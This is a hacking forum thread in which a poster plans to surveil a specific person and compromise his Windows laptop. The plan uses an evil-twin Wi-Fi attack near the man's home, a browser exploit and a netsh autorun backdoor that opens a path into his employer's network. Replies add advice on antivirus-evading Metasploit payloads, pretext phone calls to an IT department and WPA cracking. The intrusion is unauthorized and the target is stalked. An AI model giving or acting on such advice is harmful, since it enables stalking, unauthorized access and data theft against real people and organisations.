Forum Thread: Msfconsole Payloads Encoding and Uncommon Wifi Hacking Methods

Hi Everyone!

This is my first post here , but I've been reading Null-Byte for a long time, learning ang getting better and better. Thanks especially to OTW, CIUFFY and Hacker|Cracker I love your posts! Today I've finished reading articles and manuscripts about evading AV. That knowledge brought me some questions so I decided to sign up and join this great community.

  1. Can I change/add custom template to PAYLOAD (for example reversetcp for windows) and then use it in msfconsole with built-in exploit/or created myself?
  2. Can I encode all PAYLOADS at once (using for example 40 times interation of x86 shikataganai) and save them for later and use it with msfconsole? I was reading great OTW's posts, searching in the Internet, but the most common example is making encoded exe file. I know, that I can hijack and "patch" some updates to deliver my code, but I wanted to deliver it with some exploits from msf trunk. For example 067netapi exploit.

Now I wanted to ask about some advanced WiFi hacking methods and problem with subnets.

I know, that this might be really stupid question, my english is not very good, sometimes I do not know how to ask google. If it is discussed subject, please just give me right query, I will find it myself, I am not lazy! :) So:

Let's assume, that we are in StarCaffe or McBurger, with login required to "sell" our email/privacy. That's ok, I can bypass it by icmpt tunneling, or dns. But I want to discover hosts. The problem is, that clients join to other subnets and not all of them are in my subnet (for example I am the only one). Is it possible, to implement such solution? And it is possible to scan it with nmap? For example what kind of command I am supposed to use to scan range from 192.168.0.1 to 192.168.16.254 ? Simple hyphen doesn't work for me. Of course if this is not possible without login, I can simply use 10minute mail.

This is the part I am most excited about. Not everyone knows, that Windows 7 and above can create software AP with built-in commands (netsh). You can do it simple by compromising system and using simple commands, but I was thinking about something different. Let's assume situtation, that I have to compromise bad guy files. Let's assume:

  • he uses WPA/WPA2 encrypted WiFi at "work"
  • he has Windows 7 laptop with encrypted container
  • I did my homework, a little espionage and I know where he lives, where he works, where he eats.

Now, I can:

  1. Steal his notebook and try to crack encryption, bad idea, I can use biosmemige just after shutdown, to recover encryption passphrase and then try to get files, but this could compromise my operation.
  2. Secon option is much better. Let's say, I can park my car nearby, bump him off his network, using karma on my kali linux machine auto-create ESSID he tries to connect with, his system auto-connets to my network. Now I can start exploitation, but there is possibility of connection lost and stuff like that. So I have 5 minutes to do something. I can compromise his browser by autopwn2 and inject somehow reversetcp payload, or create a gateway to future exploitation:
  • run netsh on his box, adding script to autorun

Now I have Internet connection with his network even after reboot. He is our gateway. We can compromise his computer, and use it to compromise whole network. Have anybody tried that? So far I am making come configurations on my win 7 and 8.1 boxes and tomorrow I will apply this attack. If you have any advices, please share it, because as you know, I am new to hacking, but I am learning quickly. If you have never thought about that exploitation, just let me to know, if you are interesed. I will try to write post after success :)

Thanks for any replay, If I've screwed something I am really sorry.

4 Responses

I'm not sure what your question about the encoding is exactly about.

However I'm assuming you're referring to generating payloads and then use them later? Of course, however it may be better to just generate them on the fly or create a script to do so. If you're looking for better ways to evade anti-virus you should check out Veil Evasion or writing your own payloads. There are many good tutorials here https://null-byte.wonderhowto.com/how-to/evading-av-software/ for this.

The subnet question is a tricky one, simply because I am unsure of the network you're interacting with. Some AP's use this technology called client isolation which will essentially separate you from the rest of the network, to my knowledge there is no way to evade this, however more experienced ones will surely know the answer to this.

As for the exploitation scenario you've explained, the sky is your limit, however I have found personally that browser autpwn/2 doesn't have amazing success rates. You'd be better off doing enough recon to become aware of the anti-virus they use, perhaps by social engineering the IT dept (call on the pretext of selling a brand new Anti-Virus product, people are very open to sailspeople, and people love to contradict people, perhaps even put a call center audio loop in the background), and then generating a payload that is capable of bypassing that AV using a test lab and msfvenom.

Hope I'm of any help :)
pry0cc

Such a honor to be useful around here.

1) You can if you mess around a little bit with Ruby and Metasploit Unleashed.
2) The script solution provided by Pry0cc sounds best. The Payload is hardcoded with your IP, which might change.

For the scanning question, you want to look for Class B network scanning.

As for the connection error problem, you can inject an auto run payload addressing port and public IP address of your listener machine. That sounds like a too complicated and temporary set up. He could just shut the computer down.

Many details. This is the kind of question that deserves an answer.

To hack that wifi... you can either use aircrack suite...
Or you can use reaver or bully if it has wps..
Fastest and easiest bet would be social engeneering! ! ;);)

Thank all of you!
CIUFFY:

Of course I have already read a lot and used Veil. The point is, that meterpreter is the most recognizable malicious code ever made :). People from AV labs ain't stupid, probably they started with malware, so I belive that all of common AVs recognize it. So I wanted to change it in the way it will not trigger any alerts. I do not to create new exe file, because is easy and I know how to do it :) I will stady harder and try your solutions.

pry0cc:
As I mentioned, I know Veil, cobalt-strike etc. Thanks.
About subnets:
Probably it is client isolation. I will setup mikrotikOS router and try to handle it, maybe I met this kind of options.

SE7ENPEACE:

Yeah, I know but: to crack WPS you need special setup of AP. I have no patience to use aircrack-ng. Usually, I just collect handshake with airodump and then use oclhashcat. It is the fastest way, but... You have to have this password in wordlist. I can pipe JTR, modify it, but there are no collisions in encryption used in WPA/WPA2.

My scenairo can by deployed by usb-driveby hack. The point is, to get access to that network, that is highly secure (radius with encryption). When you create such soft AP, then you can access this network. Today I've managed to exploit gateway (windows 7) so I will post soon with solution how to do that. I'm using alfa NIC and yagi antenna, so range is not a problem, so I think that this metod can be usefull during full security audit and penetration test of company.

Thanks again, and sorry for my english :)

Share Your Thoughts

  • Hot
  • Active